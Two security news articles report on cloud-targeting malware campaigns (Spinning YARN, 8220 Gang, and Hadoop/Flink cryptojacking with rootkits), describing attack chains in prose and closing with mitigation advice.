Mar 06, 2024NewsroomServer Security / Cryptocurrency

Threat actors are targeting misconfigured and vulnerable servers running Apache Hadoop YARN, Docker, Atlassian Confluence, and Redis services as part of an emerging malware campaign designed to deliver a cryptocurrency miner and spawn a reverse shell for persistent remote access.

“The attackers leverage these tools to issue exploit code, taking advantage of common misconfigurations and exploiting an N-day vulnerability, to conduct Remote Code Execution (RCE) attacks and infect new hosts,” Cado security researcher Matt Muir said in a report shared with The Hacker News.

The activity has been codenamed Spinning YARN by the cloud security company, with overlaps to cloud attacks attributed to TeamTNT, WatchDog, and a cluster dubbed Kiss-a-dog.

It all starts with deploying four novel Golang payloads that are capable of automating the identification and exploitation of susceptible Confluence, Docker, Hadoop YARN, and Redis hosts. The spreader utilities leverage masscan or pnscan to hunt for these services.

“For the Docker compromise, the attackers spawn a container and escape from it onto the underlying host,” Muir explained.

The initial access then paves the way for the deployment of additional tools to install rootkits like libprocesshider and diamorphine to conceal malicious processes, drop the Platypus open-source reverse shell utility, and ultimately launch the XMRig miner.

“It’s clear that attackers are investing significant time into understanding the types of web-facing services deployed in cloud environments, keeping abreast of reported vulnerabilities in those services and using this knowledge to gain a foothold in target environments,” the company said.

The development comes as Uptycs revealed 8220 Gang’s exploitation of known security flaws in Apache Log4j (CVE-2021-44228) and Atlassian Confluence Server and Data Center (CVE-2022-26134) as part of a wave of assaults targeting cloud infrastructure from May 2023 through February 2024.

“By leveraging internet scans for vulnerable applications, the group identifies potential entry points into cloud systems, exploiting unpatched vulnerabilities to gain unauthorized access,” security researchers Tejaswini Sandapolla and Shilpesh Trivedi said.

“Once inside, they deploy a series of advanced evasion techniques, demonstrating a profound understanding of how to navigate and manipulate cloud environments to their advantage. This includes disabling security enforcement, modifying firewall rules, and removing cloud security services, thereby ensuring their malicious activities remain undetected.”

The attacks, which single out both Windows and Linux hosts, aim to deploy a cryptocurrency miner, but not before taking a series of steps that prioritize stealth and evasion.

It also follows the abuse of cloud services primarily meant for artificial intelligence (AI) solutions to drop cryptocurrency miners as well as host malware.

“With both mining and AI requiring access to large amounts of GPU processing power, there’s a certain degree of transferability to their base hardware environments,” HiddenLayer noted last year.

Cado, in its H2 2023 Cloud Threat Findings Report, noted that threat actors are increasingly targeting cloud services that require specialist technical knowledge to exploit, and that cryptojacking is no longer the only motive.

“With the discovery of new Linux variants of ransomware families, such as Abyss Locker, there is a worrying trend of ransomware on Linux and ESXi systems,” it said. “Cloud and Linux infrastructure is now subject to a broader variety of attacks.”

Jan 12, 2024NewsroomCryptocurrency / Malware

Cybersecurity researchers have identified a new attack that exploits misconfigurations in Apache Hadoop and Flink to deploy cryptocurrency miners within targeted environments.

“This attack is particularly intriguing due to the attacker’s use of packers and rootkits to conceal the malware,” Aqua security researchers Nitzan Yaakov and Assaf Morag said in an analysis published earlier this week. “The malware deletes contents of specific directories and modifies system configurations to evade detection.”

The infection chain targeting Hadoop leverages a misconfiguration in the YARN’s (Yet Another Resource Negotiator) ResourceManager, which is responsible for tracking resources in a cluster and scheduling applications.

Specifically, the misconfiguration can be exploited by an unauthenticated, remote threat actor to execute arbitrary code by means of a crafted HTTP request, subject to the privileges of the user on the node where the code is executed.

The attacks aimed at Apache Flink, likewise, take aim at a misconfiguration that permits a remote attacker to achieve code execution sans any authentication.

These misconfigurations are not novel and have been exploited in the past by financially motivated groups like TeamTNT, which is known for its history of targeting Docker and Kubernetes environments for the purpose of cryptojacking and other malicious activities.

But what makes the latest set of attacks noteworthy is the use of rootkits to hide crypto mining processes after obtaining an initial foothold into Hadoop and Flink applications.

“The attacker sends an unauthenticated request to deploy a new application,” the researchers explained. “The attacker is able to run a remote code by sending a POST request to the YARN, requesting to launch the new application with the attacker’s command.”

The command is purpose-built to clear the /tmp directory of all existing content, fetch a file called “dca” from a remote server, and execute it, followed by deleting all files in the /tmp directory once again.

The executed payload is a packed ELF binary that acts as a downloader to retrieve two rootkits and a Monero cryptocurrency miner binary. It’s worth pointing out that various adversaries, including Kinsing, have resorted to employing rootkits to conceal the presence of the mining process.

To achieve persistence, a cron job is created to download and execute a shell script that deploys the ‘dca’ binary. Further analysis of the threat actor’s infrastructure reveals that the staging server used to fetch the downloader was registered on October 31, 2023.

As mitigations, it’s recommended that organizations deploy agent-based security solutions to detect cryptominers, rootkits, obfuscated or packed binaries, as well as other suspicious runtime behaviors.